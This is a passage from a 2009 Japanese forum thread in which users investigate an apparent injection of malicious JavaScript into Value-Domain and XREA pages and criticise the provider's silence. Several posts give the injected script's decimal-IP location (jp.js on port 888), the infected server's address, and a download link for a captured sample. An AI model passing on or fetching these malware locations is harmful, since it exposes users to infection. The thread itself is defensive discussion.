今もうPCの電源落としてアドエスからP2経由でレスしてるんで、
魚拓等必要あれば誰かたのんますー。

517:名無しさん@お腹いっぱい。
09/07/08 16:08:07 O
デジロ社員はこんなとこで遊んでないで…

とっととデジロウイルスの対策をしろよ

518:名無しさん@お腹いっぱい。
09/07/08 16:09:17 0
login.phpにあるの?今ソース確認中

519:名無しさん@お腹いっぱい。
09/07/08 16:09:26 0
IE使ってる人は要注意だなこりゃ

520:名無しさん@お腹いっぱい。
09/07/08 16:10:11 0
>>518
違う、>>511 をよく読め

521:名無しさん@お腹いっぱい。
09/07/08 16:10:15 0
この人病気なんかな・・・

522:名無しさん@お腹いっぱい。
09/07/08 16:10:57 0
value-domainの方は大丈夫だねさすがに

523:名無しさん@お腹いっぱい。
09/07/08 16:12:05 0
ログイン画面じゃなくてトップページじゃない?

524:名無しさん@お腹いっぱい。
09/07/08 16:12:58 0
なくなった…

525:名無しさん@お腹いっぱい。
09/07/08 16:13:36 0
トップページとログイン画面のソース見たけど
>>514に書かれてるやつなかったよ。別のページなのかな

526:名無しさん@お腹いっぱい。
09/07/08 16:14:11 0
たしかに貼られた直後見に行ったけど無かった
すでに消されてたのか?

527:名無しさん@お腹いっぱい。
09/07/08 16:14:16 0
まだ残ってるよ
いい加減なこと言うな

528:名無しさん@お腹いっぱい。
09/07/08 16:14:24 0
>>525
いやもうない

529:名無しさん@お腹いっぱい。
09/07/08 16:14:33 0
おいwふざけるのもいい加減にしろw
>>511みてすぐ行ったけど確認できなかったぞ!
釣られた俺が恥ずかしいだろうがあああああああああああああああ!www

530:名無しさん@お腹いっぱい。
09/07/08 16:15:53 0
自分も見つからなかったが、>>511が書き込まれた直後に対策されたか?
ソースチェッカーオンラインでは16:11にチェックされたキャッシュが残っていて、そこでは不正コードが確認できる
URLリンク(so.7walker.net)

(魚拓と違っていつまでこの不正コード入りキャッシュが残ってるかは不明


531:名無しさん@お腹いっぱい。
09/07/08 16:15:55 0
ある。ほぼ同じコードが入っている。jp.js

532:名無しさん@お腹いっぱい。
09/07/08 16:17:36 0
>>530のソースは確かに確認できた。
けどやはりアクセス解析の方はもう無いみたいだよ。

533:名無しさん@お腹いっぱい。
09/07/08 16:18:10 0
リアルタイムで改竄されてるの?

534:名無しさん@お腹いっぱい。
09/07/08 16:18:24 0
たった今消えたな
なんかついたり消えたりしてる?

535:名無しさん@お腹いっぱい。
09/07/08 16:18:30 0
いやはやなんともw
釣りじゃなくて本当にあったんだがもうなくなってるわ、少なくとも俺は確認できない

自分で見なきゃ信じられんのは俺も同じだから罵倒されてもしょうがないけど
やべぇ、ウィルスとかそんな問題より現状が面白くてしょうがないw

536:529
09/07/08 16:18:54 0
わろたwwwなんだこいつw

537:154
09/07/08 16:18:55 0
問い合わせてから2営業日経とうとしているがその後の回答が全く無い
ガセならガセでいいんだが、「改竄の事実はございません」の公式アナウンスがなぜできない!
技術に自信がないのか?ブランド信用力の低下が怖いのか?(今さら!)

VDとは6年近い付き合いだけど、今さっき全ドメイン移管手続きを執ったよ。。。

今回の件だけはVDのトップページで公式にアナウンスして欲しかった。
改竄の事実が無いなら「無い」と堂々と宣言できないVDには愛想が尽きたよ。

538:名無しさん@お腹いっぱい。
09/07/08 16:19:56 0
念のため全ページのソース見てきた。
今のとこはコード入ってないようだ。

539:名無しさん@お腹いっぱい。
09/07/08 16:20:23 0
16:17 の時点に wget で確認したけど、確かに混入してるね。
バランサで混入ありソースとなしソースが流れてるんじゃね?

540:名無しさん@お腹いっぱい。
09/07/08 16:20:25 0
魚拓のURLをよく見ろスキームはhttpsだ。
これがねつ造であるなら、SSLでなりすましが可能である事を示してる。


541:名無しさん@お腹いっぱい。
09/07/08 16:20:42 0
>>511
おもいっきり仕込まれてる。ソースで言うと62〜68行目。
64行目に 1856317799:888/jp.js がある。

542:名無しさん@お腹いっぱい。
09/07/08 16:20:55 0
デジロック関連はしばらくスクリプト切ってアクセスしたほうがいいんじゃねえか


543:名無しさん@お腹いっぱい。
09/07/08 16:21:29 0
消えた。攻撃者がここ見ててひっこめたとかだと嫌だな。

544:名無しさん@お腹いっぱい。
09/07/08 16:22:23 0
それだと上げてるやつが一番怪しく思えるぞw
まーそんなことはないでしょ

545:539
09/07/08 16:23:13 0
こいつぜってー頭狂ってるw

546:名無しさん@お腹いっぱい。
09/07/08 16:23:14 0
ax.xrea.comは全部のページやられてるなw

547:名無しさん@お腹いっぱい。
09/07/08 16:23:31 0
>>539
うわ、まじだ

>Name: ax.xrea.com
>Addresses: 219.101.229.188, 219.101.229.189
前者に不正コード確認、後者はなし

URLリンク(219.101.229.188) (現時点で不正コード注意)

548:名無しさん@お腹いっぱい。
09/07/08 16:24:07 0
この板に社員が常駐して、問題があるたびに直しているとしか思えないな

549:名無しさん@お腹いっぱい。
09/07/08 16:24:22 0
魚拓がちょうど今メンテナンス中で取れないんだよなぁ

何が起こっているのかだけでも早く知りたいよ
アナウンスしろよVD

550:名無しさん@お腹いっぱい。
09/07/08 16:24:44 0
>>539が正解じゃないか?

551:名無しさん@お腹いっぱい。
09/07/08 16:24:48 0
>>539
ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない

552:名無しさん@お腹いっぱい。
09/07/08 16:25:17 0
さっきからコードないないって書き込んでる奴だけど
>>547のURLでなら確認できた。

553:名無しさん@お腹いっぱい。
09/07/08 16:25:25 0
>>548
それはそれで対応してくれてるなら助かるけどさ
再アップロードしてはい直しました!って話だったらトルチョックかましたくなる

554:名無しさん@お腹いっぱい。
09/07/08 16:26:01 0
とりあえず、何度か取得してみたけど、あり・なしが落ちてくるね。

ありindex.html:11818 byte で CR+LF
なしindex.html:11310 byte で LF

diff は改行コード以外は 62〜68 行目の SCRIPT だけだね。

555:名無しさん@お腹いっぱい。
09/07/08 16:26:11 0
>>547
専ブラで飛んじゃうような貼り方するなよ…

556:名無しさん@お腹いっぱい。
09/07/08 16:27:20 0
魚拓のメンテ終わるのと不正コード除去とどっちがはやいかな

>>555
すまん、以後http全部抜くわ


557:名無しさん@お腹いっぱい。
09/07/08 16:28:38 0
アクセス解析タグに仕込むことも出来るんじゃと思ったら
ぞっとした

558:名無しさん@お腹いっぱい。
09/07/08 16:28:40 0
ひょっすると社員も確認する術がなくて、ガセなんじゃ・・・とか思ってるのかもなww

たぶん、リアルタイムに罠貼ったり外したりしてるw
俺は、7月5日の夜中にwikiwiki.jpの方でトロイphp仕込まれてるのみたけど、
5分後には、なくなってたりとか、管理人が削除したにしては、やけに対応が早いなとは思った。

559:名無しさん@お腹いっぱい。
09/07/08 16:29:50 0
踏んできた。一発でヒット URLリンク(www1.axfc.net) dlkey: dxvwvd

560:名無しさん@お腹いっぱい。
09/07/08 16:30:13 0
バレる前に削除して、定期的にパスを抜いてんだろうな
よくよく考えるとかなり深刻じゃないか?

561:名無しさん@お腹いっぱい。
09/07/08 16:31:09 0
>>445
「個人情報の取り扱いについて」で
>ユーザー登録時に申請された情報は一切公開されません。当データベースサーバー内に保存され、厳重に保管されます。
>自動課金等のオプションをお客様が選択される場合、クレジットカード情報が当サーバーに保存されます。それらの情報は当データベースサーバー内で暗号化・保存され、厳重に保管されます。
とはあるけど、果たして罰せられるのかねえ

「責任の限界について」で>>141に加えて
>あらゆるユーザーデータの操作処理
もあると思ったけど、不正アクセスは操作処理ではなく通常の管理だから違うのか

>あらゆる非常事態が発生したことによる損失
今回のことが非常事態といえるのか
>あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
あらゆる原因に法的例外とかはないのか

とここまで考えて思ったんだけど。。。

562:名無しさん@お腹いっぱい。
09/07/08 16:32:03 0
責任の限界もなにも通常業務レベルでセキュリティ対策は必須事項っすよ

563:名無しさん@お腹いっぱい。
09/07/08 16:33:32 0
でも不正コード削除してもログは残るんじゃないの?
内部の人が書き換えてるじゃなければ、分かりそうなもんだよね?

564:名無しさん@お腹いっぱい。
09/07/08 16:33:38 0
これやばいだろ…

565:名無しさん@お腹いっぱい。
09/07/08 16:35:14 0
ここのアクセス解析使ってるとこたくさん見るから
やばいんじゃないかな…さすがに。

566:名無しさん@お腹いっぱい。
09/07/08 16:35:50 P
>>561
法律家じゃないから根拠法とかわからんけど、消費者保護の観点から消費者に著しく不利な契約は無効とかじゃなかった?
果たすべき管理責任を果たさないことにより利用者が損害を受けた場合は当然賠償責任が発生すると思うけど。

567:名無しさん@お腹いっぱい。
09/07/08 16:36:01 0
value-domainならまだ利用者数はそれほどでもないだろうけど
xreaとなると話はだいぶ違ってくるね

568:名無しさん@お腹いっぱい。
09/07/08 16:36:17 0
魚拓が改鼠されているとかいうとんでも理論をデジロックが発表するのに期待・・・
と思ったらxreaにも仕込まれてたか、どうみてもデジロックやられてるだろw

569:名無しさん@お腹いっぱい。
09/07/08 16:36:43 P
アクセス解析のサーバーとバリュドメのサーバーは別だよね。
デジロ関係が軒並み侵入されてるってこと?

>>563
同意。

570:名無しさん@お腹いっぱい。
09/07/08 16:37:31 0
いつ改竄されたのかヘッダ見ようと思ったらこれ動的に生成してるのね。
>>554 index.htmlは存在しない。index.php。
このサーバのPHPの出力に全部くっついてくる気がする。

571:名無しさん@お腹いっぱい。
09/07/08 16:39:10 0
>>570
あぁ、すまん。そういやそうだね。

572:名無しさん@お腹いっぱい。
09/07/08 16:39:13 0
こうなると次はXREAかCOREのadmin.cgiにも仕組まれるのかな

jsの中身見たら不正コードに混じって忍者TOOLS提供の
アクセスカウンタのコードが入っていて憎たらしいと思った

573:名無しさん@お腹いっぱい。
09/07/08 16:39:49 0
いつものコピペの事務員レベルじゃ状況把握出来てないっぽいな。終わってる。
すべてのphpスクリプトの安全宣言出るまで使えないでしょ。

574:名無しさん@お腹いっぱい。
09/07/08 16:42:05 0
規約の法的拘束力って限界あるよね

電子商取引等に関する準則
?目次? 第1.オンライン取引_
5(3) なりすましを生じた場合の認証機関の責任
URLリンク(74.125.155.132)

575:名無しさん@お腹いっぱい。
09/07/08 16:42:19 0
>セキュリティベンダーなどの公開情報によれば、この脆弱性を悪用した攻撃コードは既に広範囲に仕掛けられた形跡があり、日本のサイトも含まれるという。
URLリンク(internet.watch.impress.co.jp)

今回の事と関係なし?

576:名無しさん@お腹いっぱい。
09/07/08 16:42:23 0
こんなに自在に書き換えできるんなら、よっぽど管理者を馬鹿にしてないかぎり、足跡消すはず

で、公式発表は、改ざんはないんだっけ? どうなの、これ

577:名無しさん@お腹いっぱい。
09/07/08 16:42:56 P
XREAとかにFTPのログインしても大丈夫なんだろうか

578:名無しさん@お腹いっぱい。
09/07/08 16:43:19 0
忍者のアクセスカウンタだと…?

579:名無しさん@お腹いっぱい。
09/07/08 16:43:35 0
>>575
いやそのものずばりだよ。


次ページ
最新レス表示
スレッドの検索
類似スレ一覧
話題のニュース
おまかせリスト
▼オプションを表示
暇つぶし2ch

5395日前に更新/155 KB
担当:undef